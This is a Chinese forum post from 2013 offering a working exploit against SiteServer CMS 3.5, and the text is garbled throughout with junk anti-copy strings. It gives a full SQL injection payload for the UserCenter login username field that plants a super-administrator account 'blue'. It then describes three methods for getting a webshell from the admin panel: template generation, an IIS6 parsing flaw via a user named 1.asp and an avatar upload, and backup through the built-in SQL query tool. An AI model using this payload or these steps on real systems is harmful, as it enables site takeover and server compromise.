经测试秒杀最新的3.5版
9 d. H; l( G9 u- i, I3 j+ H. k) I5 z+ W7 O5 [
stieserver官网:www.siteserver.cn" f9 q% p9 P# Q
3 V* ~' D% _1 K6 T! O % K% U: o# U) E" I
4 q4 N9 Y" L% n7 e+ ?EXP:
' c1 U6 m4 ]( j; ]
: j9 W# g: J5 _" I9 G; f' f/ I直接访问UserCenter/login.aspx
6 G. g$ _/ h* }
+ J/ \$ _, Q# r! J/ V 0 j1 |) `" q) G0 Z( W" I
( g q! C2 v/ Z) U* ^% a# K
用户名处输入:/ _. k2 ^4 u/ r2 W4 y
+ o4 S/ r' P* \2 b123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
) |7 ^4 Y! Z$ H+ Z9 A
( D; p, }) I8 e, N$ _/ T/ l
! h/ A( t4 t+ v9 r I. h g! F% V" Q& `6 b
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
8 m8 C# R N: s# ~- x7 [/ A* m2 q& n, a }; _, ]" D
5 `- ~7 j9 w5 m) u; ]1 w
( ?7 F1 m( i U之后再访问后台SiteServer/login.aspx用插入的用户登陆3 n: Q( t/ r3 z& ?9 T% |" r
8 Q- r; s! Y6 Q% y0 R$ S
+ G1 t, k9 Y. q% V- h- `) e9 O+ A% ^! ?# q" Q( j! x
后台拿webshell的三种方法:
4 g# h5 w3 ~. f4 h A( ^# K" E' P+ `' x9 k6 X ^& U2 H5 k
一、
8 B$ J; X" b; d5 |. o5 Z& L- p4 a2 t
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
9 }$ B& u% R# E9 N& c M5 m
3 r& S$ i% W; ?: E/ j. d二、' H+ ] v8 Z; ?, i0 H1 C: ?' C
9 n0 T0 C9 B% f w A8 K成员权限-》添加用户-》用户名为:1.asp2 h" I: K: j. p/ B" _; K% Z6 I
* {) I+ x9 q9 X) k3 x, fhttp://127.0.0.1/usercenter/8 H$ X, T7 j9 v3 r
- ]& t9 x+ L" e1 Q用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell7 Z! a, O. C! K5 J2 n' Y
+ S* Z, ~3 m- \; |4 }) `(ps:后台添加用户时不会验证是否含有非法字符)
) R$ y s' M2 e- @+ d9 ~8 Q+ v$ _* ?* X( I% D
三、0 O4 O* }3 J4 ^2 V/ R
( n+ a6 V/ q+ P, h1 l8 O
系统工具-》实用工具-》机器参数查看
# ?7 A7 K g& y3 n可以看到数据库类型、名称,WEB路径5 f: v w! p' e0 [
0 T7 E% w+ |- z2 a' n# P* g+ U
系统工具-》数据库工具-》SQL语句查询* h" r' V: H9 @" w
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。$ p% U0 `, u0 y+ ]. r
8 }) W, Y' q8 D& {8 h |
发表于 2013-1-11 21:10:58
收藏
支持
反对